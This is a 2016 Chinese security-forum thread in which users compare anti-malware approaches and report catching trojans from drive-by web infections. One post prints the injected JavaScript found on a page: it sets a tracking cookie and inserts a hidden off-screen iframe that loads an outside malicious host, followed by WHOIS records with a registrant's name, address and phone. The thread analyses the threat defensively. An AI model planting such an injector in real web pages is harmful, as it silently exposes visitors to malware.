别跟我说什么主防什么HIPS ，防护系统程序不受侵入才是王道，VoodooShield你过来！

显示全部楼层 · 发表于 2016-3-23 18:43:48

墨家小子发表于 2016-3-23 18:34
你说这个对，各有所好，喜欢玩游戏的玩游戏，喜欢摆弄杀软的就摆弄杀软
只要有人遭遇到了（比如我，中招 ...

恩是的，因为那些dll即使加载了系统程序联网了- -也没看出来它要干嘛，可能我大天朝防火墙自动免疫了，行为是可疑，不过安逸久了- -一下子没想那么多。还有我并不怀疑那些网站没有行为，只是难复现难复现真讨厌真讨厌。。。。下潜吃饭

显示全部楼层 · 发表于 2016-3-23 18:44:08

墨家小子发表于 2016-3-23 18:10
目前可以，我抓了两次，用ESET跟SSF

现在么... 我试试去

显示全部楼层 · 发表于 2016-3-23 18:57:21

kxmp 发表于 2016-3-23 18:44
现在么... 我试试去

我除了抓了那个dll刚才又抓了一个带图标的木马

显示全部楼层 · 发表于 2016-3-23 19:04:01

墨家小子发表于 2016-3-23 18:57
我除了抓了那个dll刚才又抓了一个带图标的木马

还会变啊....
我这里咋没效果呢!

显示全部楼层 · 发表于 2016-3-23 19:14:23

本帖最后由 85683213 于 2016-3-23 19:19 编辑

作者很有趣，还用了helloresearcher的网址
[mw_shl_code=javascript,true]window.onload = function() {
function x22bq(a, b, c) {
      if (c) {
         var d = new Date();
         d.setDate(d.getDate() + c);
      }
      if (a && b) document.cookie = a + '=' + b + (c ? '; expires=' + d.toUTCString() : '');
      else return false;
}
function x33bq(a) {
      var b = new RegExp(a + '=([^;]){1,}');
      var c = b.exec(document.cookie);
      if (c) c = c[0].split('=');
      else return false;
      return c[1] ? c[1] : false;
}
var x33dq = x33bq("8215884749a60372a2fdb9dab64b4207");
if (x33dq != "370f7d31f066181f81ec500f7ad1ea58") {
      x22bq("8215884749a60372a2fdb9dab64b4207", "370f7d31f066181f81ec500f7ad1ea58", 1);
      var x22dq = document.createElement("div");
      var x22qq = "http://js.golovkakrokodila.info/helloresearcher/?rZAHYi=FrmzgwkBhrm&nYLQBjIEZEW=IvNHNDbwrL&keyword=cfb088806523012f47941af099c80f3a&EGqzgiYdSsYzFR=kJjxstz&AaMeZrwOfZAX=cEZKugGlXUXYphG&RuanhrPVUIV=CkQMzzIniD&YnNAnpnNWXLNxnbDVDPJ=LIcHmwelqB&SJvckVEz=oVxHtZIIED&VHIxzWJ=MmiODMXAVtRW&DDtTqMddfX=kkvdLvwfzKOsRzXT&ccEnGFHYZiS=ARSQeIgpHfXMvuYwh&GiMsZFnBFxa=bRJdKHCEh";
      x22dq.innerHTML = "<div style='position:absolute;z-index:1000;top:-1000px;left:-9999px;'><iframe src='" + x22qq + "'></iframe></div>";
      document.body.appendChild(x22dq);
}
}[/mw_shl_code]

要有恶意行为，*.golovkakrokodila.info要上的去

附上dns 资料
[mw_shl_code=css,true]Domain Name: GOLOVKABEGEMOTA.INFO
Domain ID: D503300000006507669-LRMS
WHOIS Server:
Referral URL: http://www.PublicDomainRegistry.com
Updated Date: 2016-03-02T19:11:27Z
Creation Date: 2016-03-02T19:07:20Z
Registry Expiry Date: 2017-03-02T19:07:20Z
Sponsoring Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Sponsoring Registrar IANA ID: 303
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant ID: DI_51885724
Registrant Name: Kiril
Registrant Organization: N/A
Registrant Street: Moscow, B. Melnikova 42
Registrant City: Moscow
Registrant State/Province: Moscow
Registrant Postal Code: 123411
Registrant Country: RU
Registrant Phone: +7.934522346
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:
Admin ID: DI_51885724
Admin Name: Kiril
Admin Organization: N/A
Admin Street: Moscow, B. Melnikova 42
Admin City: Moscow
Admin State/Province: Moscow
Admin Postal Code: 123411
Admin Country: RU
Admin Phone: +7.934522346
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email:
Tech ID: DI_51885724
Tech Name: Kiril
Tech Organization: N/A
Tech Street: Moscow, B. Melnikova 42
Tech City: Moscow
Tech State/Province: Moscow
Tech Postal Code: 123411
Tech Country: RU
Tech Phone: +7.934522346
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email:
Billing ID: DI_51885724
Billing Name: Kiril
Billing Organization: N/A
Billing Street: Moscow, B. Melnikova 42
Billing City: Moscow
Billing State/Province: Moscow
Billing Postal Code: 123411
Billing Country: RU
Billing Phone: +7.934522346
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email:
Name Server: GOTL549293.MARS.ORDERBOX-DNS.COM
Name Server: GOTL549293.EARTH.ORDERBOX-DNS.COM
Name Server: GOTL549293.VENUS.ORDERBOX-DNS.COM
Name Server: GOTL549293.MERCURY.ORDERBOX-DNS.COM
DNSSEC: unsigned[/mw_shl_code]

http://whois.domaintools.com/golovkabegemota.info

显示全部楼层 · 发表于 2016-3-23 19:23:50

kxmp 发表于 2016-3-23 19:04
还会变啊....
我这里咋没效果呢!

我都抓三个了，两个exe，一个dll

显示全部楼层 · 发表于 2016-3-23 19:25:30

85683213 发表于 2016-3-23 19:14
作者很有趣，还用了helloresearcher的网址
[mw_shl_code=javascript,true]window.onload = function() {
...

为什么在同一时间段内会挂不同的木马？以往都是一段时间内，只有一个木马

显示全部楼层 · 发表于 2016-3-23 19:33:29

墨家小子发表于 2016-3-23 19:25
为什么在同一时间段内会挂不同的木马？以往都是一段时间内，只有一个木马

因为他不只这个javascript
详情http://urlquery.net/report.php?id=1458731220424

显示全部楼层 · 发表于 2016-3-23 19:55:24

墨家小子发表于 2016-3-23 16:04
你话里的意思是如果是Oday那大家遇上了就重装了吧，是这个意思不？
前几天我倒是遇到好几个诺顿IP ...

差不多是这个意思。不过，能被价值几万美金，窗口期只有几天到几周的0Day攻击也赚了不是？
EMET Hitmanpro.Alert一类的软件可以缓解。

显示全部楼层 · 发表于 2016-3-23 20:25:21

85683213 发表于 2016-3-23 19:33
因为他不只这个javascript
详情http://urlquery.net/report.php?id=1458731220424

看不懂

[讨论] 别跟我说什么主防什么HIPS ，防护系统程序不受侵入才是王道，VoodooShield你过来！

评分

评分